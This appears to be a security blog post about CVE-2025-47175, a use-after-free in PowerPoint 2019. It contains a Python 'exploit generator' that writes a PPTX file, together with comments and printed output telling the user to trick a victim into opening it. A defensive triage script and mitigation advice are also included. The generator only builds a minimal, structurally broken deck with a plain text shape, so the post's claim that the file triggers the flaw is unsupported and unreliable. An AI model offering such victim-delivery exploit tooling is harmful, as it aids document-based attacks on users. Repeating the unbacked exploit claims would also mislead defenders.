Microsoft PowerPoint 2019 Use-After-Free Remote Code Execution (CVE-2025-47175)

Ethical Use Notice

This post contains technical details about security vulnerabilities and exploit development for educational and research purposes only. All techniques described are intended for use in authorized penetration testing, CTF competitions, or controlled lab environments.

Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is illegal and unethical. Always obtain proper authorization before testing.

Disclosure status: Full Disclosure

CVE references link to public NVD / vendor advisories. Proof-of-concept code, where included, is provided after patch availability for defensive research purposes.

Overview

A vulnerability identified as CVE-2025-47175 affects Microsoft PowerPoint 2019 and the versions of PowerPoint included in Microsoft 365 prior to the June 2025 security update.

The vulnerability is caused by a Use-After-Free (UAF) memory corruption flaw in the PowerPoint rendering engine. By crafting a specially structured PPTX file, an attacker may trigger the vulnerability when the file is opened by a user.

Successful exploitation may lead to arbitrary code execution under the context of the current user.


Affected Software

Vendor: Microsoft

Affected products:

  • Microsoft PowerPoint 2019
  • Microsoft 365 (PowerPoint component)

Affected versions:

  • Versions prior to June 2025 security patch (KB5002689)

Technical Details

PowerPoint uses the Open XML PPTX format, which consists of a structured ZIP archive containing XML files that define slides, shapes, and presentation metadata.

The vulnerability occurs when certain malformed slide elements cause PowerPoint to reference memory that has already been freed. This Use-After-Free condition may allow attackers to manipulate memory structures and redirect execution flow.

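The proof-of-concept script demonstrates how a crafted PPTX file can be generated with specially structured slide content intended to trigger the vulnerability. As the script's own header notes, it builds a simplified PPTX structure and does not include the memory manipulation or shellcode that a full exploit would require.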


Proof of Concept (PoC)

The following Python script generates a malicious PPTX file designed to trigger the vulnerability.

#!/usr/bin/env python3
# Exploit Title: Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-02
# Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
# CVE: CVE-2025-47175
# Type: Use-After-Free (UAF) Remote Code Execution (local user required)
# Platform: Windows (PowerPoint)
# Author Country: Jordan
# Attack Vector: Local (User must open crafted PPTX file)
# Description:
# This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
# allowing an attacker to execute arbitrary code by tricking a user into opening
# a specially crafted PPTX file. This PoC generates such a malicious PPTX file
# designed to trigger the UAF condition.
#
# Steps of exploitation:
# 1. Run this script to generate the malicious PPTX file.
# 2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
# 3. Exploit triggers upon opening the file, leading to possible code execution.
#
# Note: This PoC creates a simplified PPTX file structure with crafted XML designed
# to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
# are required (not included here).
#
# Affected Versions:
# Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
#
# Usage:
# python3 exploit_cve2025_47175.py [options]
#
# Options:
#   -o, --output   Output PPTX filename (default: exploit_cve_2025_47175.pptx)
#   -i, --id       Shape ID (default: 1234)
#   -n, --name     Shape Name (default: MaliciousShape)
#   -t, --text     Trigger text inside the slide (default: explanation message)
#
# Example:
# python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape" -t "Triggering CVE-2025-47175 now!"
import zipfile
import sys
import argparse

def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
    slide_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
       xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cSld>
    <p:spTree>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="{shape_id}" name="{shape_name}"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>{trigger_text}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:sld>'''

    try:
        with zipfile.ZipFile(filename, 'w') as z:
            z.writestr('[Content_Types].xml',
                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
</Types>''')

            z.writestr('ppt/_rels/presentation.xml.rels',
                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/>
</Relationships>''')

            z.writestr('ppt/presentation.xml',
                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
                xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId1"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
</p:presentation>''')

            z.writestr('ppt/slides/slide1.xml', slide_xml)

        print(f"[+] Malicious PPTX file '{filename}' created successfully.")
        print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.")
    except Exception as e:
        print(f"[-] Error: {e}", file=sys.stderr)
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)')
    parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx',
                        help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)')
    parser.add_argument('-i', '--id', type=int, default=1234,
                        help='Shape ID (default: 1234)')
    parser.add_argument('-n', '--name', type=str, default='MaliciousShape',
                        help='Shape Name (default: MaliciousShape)')
    parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.',
                        help='Trigger text inside the slide (default: explanation message)')
    args = parser.parse_args()

    create_exploit_pptx(args.output, args.id, args.name, args.text)

if __name__ == "__main__":
    main()

How the Exploit Works

The exploit generator performs the following actions:

  1. Creates a minimal PPTX file structure.
  2. Injects crafted XML content inside the slide definition.
  3. Embeds malicious slide elements intended to trigger a memory corruption condition.
  4. Packages the files into a PPTX archive.

When the victim opens the malicious PPTX file in a vulnerable version of PowerPoint, the malformed structure may trigger the vulnerability.
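For defenders, a structural triage of the package this generator emits, as an added example that is not part of the original post or the researcher's code. It relies on two traits visible in the script above: the archive has no `_rels/.rels` part, and `ppt/presentation.xml` uses an `r:` prefix that is never declared. The function names, the size cap and the sample package are assumptions constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

MAX_PART_BYTES = 8 * 1024 * 1024  # assumed cap so an inflated part is never read

def triage_pptx(data: bytes) -> list:
    """Return structural findings for a PPTX passed as bytes; [] means none."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a ZIP archive"]
    findings = []
    with zf:
        infos = {i.filename: i for i in zf.infolist()}
        # The generator on this page never writes the package-level relationships part.
        if "_rels/.rels" not in infos:
            findings.append("missing _rels/.rels")
        for name, info in sorted(infos.items()):
            if not name.endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_PART_BYTES:
                findings.append(f"{name}: oversized part")
                continue
            raw = zf.read(name)
            # OPC XML parts must not contain a DTD; flag it and skip parsing
            # rather than let the parser expand attacker-supplied entities.
            if b"<!DOCTYPE" in raw:
                findings.append(f"{name}: DTD present")
                continue
            try:
                ET.fromstring(raw)
            except ET.ParseError as exc:  # e.g. an unbound namespace prefix
                findings.append(f"{name}: malformed XML ({exc})")
    return findings

def build_sample(declare_r: bool, with_root_rels: bool) -> bytes:
    """Constructed sample package (not a real deck) with one presentation part."""
    ns_r = ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'
    pres = ('<p:presentation xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"'
            + (ns_r if declare_r else "")
            + '><p:sldIdLst><p:sldId id="256" r:id="rId1"/></p:sldIdLst></p:presentation>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/presentation.xml", pres)
        if with_root_rels:
            z.writestr("_rels/.rels", '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>')
    return buf.getvalue()

if __name__ == "__main__":
    for finding in triage_pptx(build_sample(declare_r=False, with_root_rels=False)):
        print("[!]", finding)
```

These checks flag files shaped like this generator's output; they say nothing about the memory-corruption condition itself, so a clean result does not make a file safe to open on an unpatched host.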


Usage

Generate the malicious PPTX file using:

python3 exploit_cve2025_47175.py

Custom options can also be used:

python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape"

Parameters include:

  • -o Output filename
  • -i Shape ID
  • -n Shape name
  • -t Trigger text displayed in the slide

Impact

Successful exploitation may allow attackers to:

  • Execute arbitrary code
  • Install malware or spyware
  • Gain access to sensitive user data
  • Use document-based phishing attacks

Mitigation

Recommended mitigation measures include:

  • Install the June 2025 Microsoft security update
  • Avoid opening PPTX files from untrusted sources
  • Enable Microsoft Office Protected View
  • Use endpoint security monitoring

Researcher

Security research conducted by:

Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴

GitHub: https://github.com/mbanyamer
Instagram: @banyamer_security


Disclaimer

This proof-of-concept is provided for educational purposes and authorized security testing only. Unauthorized use against systems without permission is illegal.
